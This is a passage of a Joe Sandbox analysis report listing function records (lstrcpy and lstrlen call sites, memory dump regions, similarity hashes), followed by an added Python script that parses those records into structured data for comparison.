                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 7daf8cfbd9050ebc2d7d1e09bf61fb1e5242f14b7f3b103acf9cd6130bb3b1b5
                                  • Instruction ID: 6661d7258261a6f7290e3d0902fc7fadeba6b2cd9c59ba8f820056627d022c47
                                  • Opcode Fuzzy Hash: 7daf8cfbd9050ebc2d7d1e09bf61fb1e5242f14b7f3b103acf9cd6130bb3b1b5
                                  • Instruction Fuzzy Hash: 9781D271E003099BDB54DF98DC44BAEB7B6AF94314F1C806AE908AB381EB759D41DB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FD15A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD15D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 5b2050672f21b3ab9a77a450c94af144fe9ed88811dc05ae6342219ac8cd3c50
                                  • Instruction ID: febddba5e949f607b6c85264490c5d06ecb24312df15c8ecf8330c08450b3835
                                  • Opcode Fuzzy Hash: 5b2050672f21b3ab9a77a450c94af144fe9ed88811dc05ae6342219ac8cd3c50
                                  • Instruction Fuzzy Hash: D621B874A11B029BD774EF6AD854A17B7FABF44710B084A1DA496C7B40DB38E841EF90
                                  APIs
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000), ref: 00FB162D
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB164F
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB1671
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 3e56e792efb23660347ddb7c625d3a57eb4f5867aa30a7c7ceb9355a481119f2
                                  • Instruction ID: b1ff1f034a0dc4355c2317ec3558a87757326a20821bc0cc6a95e452de8536ac
                                  • Opcode Fuzzy Hash: 3e56e792efb23660347ddb7c625d3a57eb4f5867aa30a7c7ceb9355a481119f2
                                  • Instruction Fuzzy Hash: B131D474A11B029FD728DF7AC598992BBE5BF88314744492DA8A6C3B10DB34F851DF80
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FB162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 99317805bd682a73dda2ffc8c87f6260e63e519dde07c1808b16298bb7113244
                                  • Instruction ID: fb5345277939986c683d4b0533121a3f152013cddfda09145654a10a75d24578
                                  • Opcode Fuzzy Hash: 99317805bd682a73dda2ffc8c87f6260e63e519dde07c1808b16298bb7113244
                                  • Instruction Fuzzy Hash: 10115E74A11B029BDB289F77D468966B7F9BF44311748052DA89AC7B40EB34E841DF90
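The function records above (APIs with call-site refs, the memory dump regions they were lifted from, and the Similarity IDs) are the parts of a Joe Sandbox report an analyst usually wants as structured data, for example to pull every lstrcpy call site or to compare API String IDs between two samples. The following parser is an added example and is not Joe Sandbox code or part of this report. It expects the flattened text layout of this page; the record field names (apis, subcall_of, associated, similarity and so on) are this example's own choice, and the embedded sample is a constructed excerpt of three records from this page with their Associated lists and most hash lines trimmed.

```python
# Added example, not Joe Sandbox code: parse the per-function records shown above
# (APIs / Memory Dump Source / Similarity) into dicts so API references and similarity
# IDs can be queried or diffed across reports. Field names such as "subcall_of" are this
# example's own; it expects the flattened text layout of this page.
import re
from collections import Counter

# One API reference: "GetProcessHeap.KERNEL32(00000008,?), ref: 00FB6F74" or
# "std::_Xinvalid_argument.LIBCPMT ref: 00FC7C94", optionally prefixed with
# "Part of subcall function 00FC7D40: " when the call sits inside a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]{8})$"
)
SOURCE_RE = re.compile(r"^Source File: (?P<file>[^,]+), Offset: (?P<off>[0-9A-F]{8}), based on PE: \w+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}


def parse_records(text):
    """Split report text into function records; each 'APIs' header starts a new one."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # drop indentation and the bullet glyph
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                records.append({"apis": [], "associated": [], "source_file": None,
                                "offset": None, "snapshot": None, "similarity": {}})
            section = line
            continue
        if not records:
            continue  # tail of a record whose 'APIs' header lies before this excerpt
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec["apis"].append({"api": m["api"], "module": m["mod"], "ref": m["ref"], "subcall_of": m["sub"],
                                    "args": m["args"].split(",") if m["args"] is not None else []})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                rec["source_file"], rec["offset"] = m["file"], int(m["off"], 16)
            elif line.startswith("Associated: "):
                rec["associated"].append(line[len("Associated: "):])
        elif section == "Joe Sandbox IDA Plugin" and line.startswith("Snapshot File: "):
            rec["snapshot"] = line[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, value = line.partition(":")  # value may be empty, e.g. "String ID:"
            rec["similarity"][key.strip()] = value.strip()
        else:  # Strings, Yara matches: keep the raw lines under the section name
            rec.setdefault(section, []).append(line)
    return records


def api_histogram(records, direct_only=True):
    """Count API names; subcall entries are skipped by default because they repeat
    what the callee's own record already lists."""
    return Counter(a["api"] for r in records for a in r["apis"]
                   if not direct_only or a["subcall_of"] is None)


def refs_calling(records, api):
    """Call-site addresses (hex strings) that invoke `api` directly."""
    return sorted(a["ref"] for r in records for a in r["apis"] if a["api"] == api and a["subcall_of"] is None)


# Constructed input: three records copied from this page, with the 16-entry
# 'Associated' lists and most hash lines trimmed for brevity.
SAMPLE = """
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00FC7C94
• std::_Xinvalid_argument.LIBCPMT ref: 00FC7CAF
  • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D58
Strings
Memory Dump Source
• Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_file.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
APIs
• GetProcessHeap.KERNEL32(00000008,?), ref: 00FB6F74
• RtlAllocateHeap.NTDLL(00000000), ref: 00FB6F7B
Similarity
• API ID: Heap$AllocateProcess
• String ID: @
• API String ID: 1357844191-2766056989
APIs
• lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD244C
• lstrlen.KERNEL32(00000000), ref: 00FD24E9
Similarity
• API ID: lstrcpylstrlen
• String ID:
• API String ID: 2001356338-0
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", api_histogram(recs).most_common(3), refs_calling(recs, "lstrcpy"))
```

Subcall entries are counted separately from direct calls on purpose: the report repeats a callee's API references under every caller ("Part of subcall function ..."), so counting them would inflate any per-API statistic. The Similarity values are kept as the strings the report prints; the page does not state how the API String ID is derived, so the parser does not try to recompute it.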